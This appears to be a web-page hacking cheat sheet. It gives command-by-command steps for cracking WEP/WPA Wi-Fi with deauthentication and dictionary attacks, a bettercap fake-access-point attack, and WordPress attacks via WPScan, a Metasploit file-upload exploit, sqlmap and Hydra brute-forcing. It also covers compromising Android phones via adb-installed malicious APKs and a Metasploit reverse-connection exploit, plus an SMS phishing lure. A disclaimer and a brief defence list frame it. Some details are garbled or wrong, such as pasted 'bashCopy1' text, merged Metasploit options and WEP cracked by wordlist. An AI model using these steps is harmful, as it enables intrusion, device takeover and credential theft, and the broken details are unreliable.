⚠️ Disclaimer : This information is for educational and ethical hacking purposes only . Unauthorized network penetration or device exploitation is illegal and ** unethical**. Always obtain explicit permission before testing any system.
1. Hacking Wireless Networks (WEP, WPA, WPA2)
Tools : Aircrack-ng Suite, Wireshark, Bettercap
A. Cracking WEP (Weak and Obsolete)
- Steps :
- Capture Packets :bashCopy1airodump-ng wlan0mon -c 6 –bssid [BSSID] -w wep_handshake
- Deauthenticate Clients (to capture enough packets):
- aireplay-ng -0 0 -a [BSSID] wlan0mon
- Crack the WEP Key :bashCopy1aircrack-ng -b [BSSID] -w /usr/share/wordlists/rockyou.txt wep_handshake-01.cap
B. Cracking WPA/WPA2 (Practical Only with a Handshake)
- Steps :
- Capture Handshake :
- airodump-ng wlan0mon -c 6 –bssid [BSSID] -w wpa_handshake
- Deauthenticate Client :
- aireplay-ng -0 10 -a [BSSID] -c [Client_MAC] wlan0mon
- Crack with Dictionary :
- aircrack-ng -b [BSSID] -w /usr/share/wordlists/rockyou.txt wpa_handshake-01.cap
- GPU Acceleration (Hashcat) :
- hashcat -m 2500 -a 0 hash.cap /usr/share/wordlists/rockyou.txt
- Capture Handshake :
C. WPA2-Karma Attack (Fake AP)
- Steps :
- bettercap -iface wlan0 -eval “wifi.recon on; wifi.karma_mac add [BSSID] [SSID]; wifi.karma on”
2. Hacking WordPress Sites
Tools : WPScan, SQLMap, Metasploit, Burp Suite
A. Vulnerability Scanning
- WPScan :
- wpscan –url http://target.com –enumerate
- Identifies outdated plugins, themes, and user enumeration.
- wpscan –url http://target.com –enumerate
B. Exploiting Plugins
- Example Exploit (vulnerable plugin like “Revslider”):
- msfconsole
- use exploit/multi/http/wordpress_revslider_file_upload
- set RHOST target.com
- set RPORT 80
- exploit
C. SQL Injection
- SQLMap :
- sqlmap -u “http://target.com/?id=1” –risk=3 –level=5 –threads=5
D. Brute-Force Login
- Hydra :
- hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-wordpress
3. Exploiting Android Devices
Tools : Metasploit, ADB, Exploit-DB
A. Exploiting USB Debugging
- Steps :
- Enable ADB :
- adb devices
- Exploit Weak Permissions :
- adb shell su -c “mount -o remount,rw /system”
- Install Malicious APK :
- adb install malicious.apk
- Enable ADB :
B. Metasploit Exploits
- Example (CVE-2020-0383) :
- msfconsole
- use exploit/android/browser/webkit_javascriptcore_type_confusion
- set LHOST your_ipset LPORT 4444
- exploit
C. Phishing via SMS (Smishing)
- Steps :
- Create a fake login page.
- Send a link via SMS: “Your Google account is compromised: [link].”
Defense Strategies
Wireless Networks
- Use WPA3 (if supported).
- Disable WEP/WPA .
- Strong Passphrases (15+ characters with symbols).
- Regularly Update Firmware on routers.
WordPress Security
- Update Plugins/Themes .
- Use Strong Passwords (plugins like Wordfence).
- Limit Login Attempts (e.g., WP Security plugin).
- Disable XML-RPC (common attack vector).
Android Security
- Disable USB Debugging by default.
- Update OS/Apps promptly.
- Avoid Untrusted Links/Downloads .
- Use Antivirus Apps (e.g., Malwarebytes).
Ethical Hacking Tools for Defense
| Tool | Use Case |
|---|---|
| Aircrack-ng | Audit wireless network security. |
| WPScan | Scan WordPress sites for vulnerabilities. |
| Metasploit | Penetration testing to identify device exploits. |
| Burp Suite | Test web app security (e.g., SQLi, XSS). |
Final Notes
- Always Obtain Permission : Unauthorized access is illegal under laws like the Computer Fraud and Abuse Act (CFAA) .
- Focus on Defense : Use the above techniques to secure systems, not attack them.
- Stay Updated : Follow CVE databases (e.g., CVE Details ) for new vulnerabilities.
By understanding these methods, you can better protect networks, websites, and devices from real-world attacks. 🔒🛡️
